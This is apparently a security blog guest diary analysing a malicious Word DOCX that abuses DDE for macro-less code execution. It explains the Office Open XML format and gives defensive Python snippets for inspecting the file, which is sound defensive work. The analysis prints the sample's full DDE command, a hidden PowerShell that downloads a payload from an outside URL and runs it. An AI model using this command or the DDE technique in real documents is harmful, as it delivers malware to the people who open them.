Last Updated: 2017-10-26 04:22:53 UTC
by Richard Porter (Version: 1)
Guest Diary: Etay Nir
In the past few days, the industry became aware of a new technique to deliver malware, using macro-less code execution in MS Word, leveraging the Microsoft Dynamic Data Exchange (DDE) protocol. A good research blog entry can be found here:
In this post, I will:
- Give some background on the DDE protocol
- Describe the Microsoft Open XML format
- Analyze a sample identified by a hash found at VirusTotal
Dynamic Data Exchange
Windows provides several methods for transferring data between applications. One method is to use the DDE protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data, and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges, in which applications send updates to one another, as new data becomes available.
Windows also supports the Dynamic Data Exchange Management Library (DDEML). The DDEML is a dynamic-link library (DLL) that applications can use to share data. The DDEML provides functions and messages that simplify the task of adding DDE capability to an application. Instead of sending, posting, and processing DDE messages directly, an application uses the DDEML functions to manage DDE conversations. (A DDE conversation is the interaction between client and server applications.)
Further information about DDE can be found here:
Microsoft Open XML Format
To better understand how the various Office malware research tools and utilities work and why they were designed the way they were, including the macro-less execution in MS Word covered in this post, a good starting point is the basic structure and format of Microsoft Office documents.
Following the advent of XML in the 1990s, corporate computing customers began to realize the business value in adopting open formats and standardization in the computer products and applications that they relied on. IT professionals benefited from the common data format possible with XML because of its capacity to be read by applications, platforms, and Internet browsers.
Likewise, with the adoption of support for XML in Microsoft Office 2000, developers began to see the need to transition from the binary file formats seen in previous versions of Microsoft Office to the XML format. Binary files (.doc, .dot, .xls, and .ppt files), which for years did a great job of storing and transporting data, were not able to meet the new workplace challenges that included easily moving data between disparate applications, and allowing users to glean business insight from that data.
The 2007 Microsoft Office system continues with this transition by adopting an XML-based file format for Microsoft Office Excel 2007, Microsoft Office Word 2007, and Microsoft Office PowerPoint 2007. The new file format, called Office Open XML Formats, addresses these workplace issues with changes that affect the way you approach solutions based on Microsoft Office documents.
Office Open XML is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents. The format was initially standardized by Ecma (as ECMA-376), and in later versions by the ISO and IEC (as ISO/IEC 29500).
Starting with Microsoft Office 2007, the Office Open XML file formats have become the default target file format of Microsoft Office. Microsoft Office 2010 provides read support for ECMA-376, read/write support for ISO/IEC 29500 Transitional, and read support for ISO/IEC 29500 Strict. Microsoft Office 2013 and Microsoft Office 2016 additionally support both reading and writing of ISO/IEC 29500 Strict.
In this post, we will focus mainly on the DOCX format, and will provide links and sources for further reading in the “Suggested Reading” section.
DOCX is the file format for Microsoft Word 2007 and later, which should not be confused with DOC, the binary format used by earlier versions of Microsoft Word.
A DOCX file is a ZIP archive containing XML files and binary parts. The content can be analyzed without modification by unzipping the file (e.g. in WinZIP) and examining the contents of the archive.
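As a minimal sketch of that idea, the archive can also be listed with Python's standard zipfile module instead of a GUI unzip tool. The function name list_docx_parts and the file name in the usage comment are illustrative assumptions, not something from the original analysis.

```python
import zipfile


def list_docx_parts(path):
    """Return (member name, uncompressed size) for each part in the archive.

    Nothing is extracted to disk; only the ZIP central directory is read.
    """
    with zipfile.ZipFile(path) as archive:
        return [(info.filename, info.file_size) for info in archive.infolist()]


# Hypothetical usage (sample.docx is a placeholder name):
# for name, size in list_docx_parts("sample.docx"):
#     print(f"{size:>10}  {name}")
```

Reading the member list this way avoids writing any part of a suspicious document to disk.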
The file _rels/.rels contains information about the structure of the document. It contains paths to the metadata information as well as the main XML document that contains the content of the document itself.
Metadata is usually stored in the folder docProps. Two or more XML files are stored inside that folder: app.xml, which stores metadata extracted from the Word application itself, and core.xml, which stores metadata from the document, such as the author name, the last time it was printed, etc.
Another folder, named word in a .docx document, contains the actual content of the document. An XML file called document.xml is the main document and holds most of the content; it is also where we will focus our attention when looking into an Office document that uses DDE.
To recap, the Word document (docx) consists of a container format (a ZIP archive of XML and binary parts) and metadata. The metadata consists of four categories:
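The two lookups described above can be sketched with the standard library. The helper names are hypothetical, the path docProps/core.xml is assumed to be the usual location (a careful tool would follow the target listed in _rels/.rels instead), and only a handful of core properties are read.

```python
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by the package relationships and core properties parts.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
CP_NS = "{http://schemas.openxmlformats.org/package/2006/metadata/core-properties}"
DC_NS = "{http://purl.org/dc/elements/1.1/}"
DCTERMS_NS = "{http://purl.org/dc/terms/}"


def read_relationships(archive):
    """Map each relationship type in _rels/.rels to its target path."""
    root = ET.fromstring(archive.read("_rels/.rels"))
    return {rel.get("Type"): rel.get("Target")
            for rel in root.iter(REL_NS + "Relationship")}


def read_core_properties(archive):
    """Return a few fields from docProps/core.xml; absent fields are None."""
    root = ET.fromstring(archive.read("docProps/core.xml"))
    wanted = {
        "creator": DC_NS + "creator",
        "lastModifiedBy": CP_NS + "lastModifiedBy",
        "created": DCTERMS_NS + "created",
        "modified": DCTERMS_NS + "modified",
        "lastPrinted": CP_NS + "lastPrinted",
    }
    return {key: root.findtext(tag) for key, tag in wanted.items()}


# Hypothetical usage (sample.docx is a placeholder name):
# with zipfile.ZipFile("sample.docx") as archive:
#     print(read_relationships(archive))
#     print(read_core_properties(archive))
```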
Document Properties – core
Document Properties – extended
Analyzing A Sample
For this particular example, I’m using a hash found at VirusTotal:
To verify we have a file with the proper format, I’ll use the ‘file’ command:
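As a rough scripted counterpart to that check, the sketch below tests whether a file is a ZIP archive that carries the [Content_Types].xml part every Open XML package includes. It is not a reimplementation of the ‘file’ command, and the function name looks_like_ooxml is an assumption made for illustration.

```python
import zipfile


def looks_like_ooxml(path):
    """Rough check: a ZIP archive that contains [Content_Types].xml."""
    if not zipfile.is_zipfile(path):
        return False
    with zipfile.ZipFile(path) as archive:
        return "[Content_Types].xml" in archive.namelist()


# Hypothetical usage (sample.docx is a placeholder name):
# print(looks_like_ooxml("sample.docx"))
```

A True result only says the container looks right; it says nothing about whether the content is benign.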
The next step is to open the sample using BBEdit.
We can immediately see the format structure of the docx file, so we can focus our attention on document.xml and look at its content.
When first opened, document.xml is collapsed into a single line; here is a ‘beautified’ version:
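A comparable view can be produced without an editor. The following is a minimal sketch that reads the main document part straight from the archive and re-indents it with xml.dom.minidom; the function name and the default member path word/document.xml are assumptions for illustration. Because the input is untrusted, a hardened XML parser may be preferable in practice.

```python
import zipfile
import xml.dom.minidom


def pretty_document_xml(path, member="word/document.xml"):
    """Return the given XML part re-indented, one element per line."""
    with zipfile.ZipFile(path) as archive:
        raw = archive.read(member)
    return xml.dom.minidom.parseString(raw).toprettyxml(indent="  ")


# Hypothetical usage (sample.docx is a placeholder name):
# print(pretty_document_xml("sample.docx"))
```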
There are a few interesting findings we can glean from this view:
- From the different lines, we can see references to C:\\Windows\\System32\\, cmd.exe, PowerShell with switches, and a call to a domain. After parsing the different lines, we get the following:
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e"
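The manual reassembly above can be approximated in code. This is a sketch only, under the assumption that the field is stored either as a complex field (w:instrText runs between w:fldChar begin and end markers) or as a w:fldSimple element in word/document.xml. The function names are hypothetical, nested fields are flattened into the outermost one, and obfuscated fields may well evade the simple keyword match.

```python
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"


def extract_field_instructions(path, member="word/document.xml"):
    """Return the instruction text of every field, in document order."""
    with zipfile.ZipFile(path) as archive:
        root = ET.fromstring(archive.read(member))
    fields, current, depth = [], [], 0
    for elem in root.iter():
        if elem.tag == W + "fldSimple":
            # Simple fields keep the whole instruction in one attribute.
            fields.append(elem.get(W + "instr", "").strip())
        elif elem.tag == W + "fldChar":
            kind = elem.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    # Join the fragments that were split across runs.
                    fields.append("".join(current).strip())
                    current = []
        elif elem.tag == W + "instrText" and depth > 0:
            current.append(elem.text or "")
    return fields


def find_dde_fields(fields):
    """Keep only instructions whose first word is DDE or DDEAUTO."""
    hits = []
    for field in fields:
        words = field.split(None, 1)
        if words and words[0].upper() in ("DDE", "DDEAUTO"):
            hits.append(field)
    return hits


# Hypothetical usage (sample.docx is a placeholder name):
# for command in find_dde_fields(extract_field_instructions("sample.docx")):
#     print(command)
```

The script only prints the instruction text; it never evaluates the field or contacts the URL inside it.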
- A few other interesting details come up during the analysis; however, I’ll set them aside, since we don’t want to make assumptions about the source or who authored this document. They are pretty visible, though.
There is also a tool that automates this analysis: msodde, a Python script written as part of the python-oletools package. I would like to thank Philippe Lagadec for authoring the msodde tool, which can be found at:
The script is pretty simple to use and pretty self-explanatory:
I would also like to thank Didier Stevens for the amazing set of tools he has written, as well as for his deep knowledge and insight.
Sources and Suggested Reading